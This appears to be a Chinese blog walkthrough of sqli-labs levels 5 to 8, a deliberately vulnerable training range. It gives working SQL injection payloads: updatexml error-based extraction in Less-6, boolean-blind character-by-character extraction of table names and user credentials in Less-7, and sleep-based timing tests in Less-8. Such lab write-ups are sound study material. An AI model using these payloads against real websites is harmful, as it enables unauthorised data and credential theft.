sqli-labs靶场通关

五.less-5

1.判断闭合

发现是'闭合

访问报错了,但是查看报错的原因,明显跟单引号的闭合问题有关
且正确的回显只有这么一种回显,所以我们可以从利用报错的信息进行注入

2.查询字段数

4时报错所以是3

3.判断回显点

根据第二步可以判断回显位是报错信息

4.爆数据库用户

5.爆数据库名

6.爆数据库表名

7.爆字段名

二.less-6

1.查询数据库名

?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+

2.查询表

?id=1 "and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

3.查询列

?id=1 "and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),0x7e),1) --+

三.less-7

1.判断闭合

布尔盲注

?id=1'))--+

2.判断字段数

?id=1')) order by 4 --+

3.判断数据库名

这是第一位字符

?id=1')) and ascii(substr(database(),1,1))>114--+

最后得出数据库名位security

4.数据库表

这是第一个表的第一个字符

id=1'))and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

最后得出四张表:emails、referers、users、uagents

5.表中内容

判断出users表的第一个字段的第一位字符:

?id=1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1.1))>104--+

最后得出所有字段为:id,username,password

6.判断username字段的第一个值

id=1'))and ascii(substr((select username from users limit 0,1),1,1))>1--+

最后得出username和password的全部值

四.less-8

1.判断页面是否跟随我们的sleep语句延时

?id=1'and sleep(3)--+

发现存在所以是时间盲注

之后使用if((布尔盲注语句),sleep(1),1)--+

和上面哪个布尔盲注一样得到内容

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值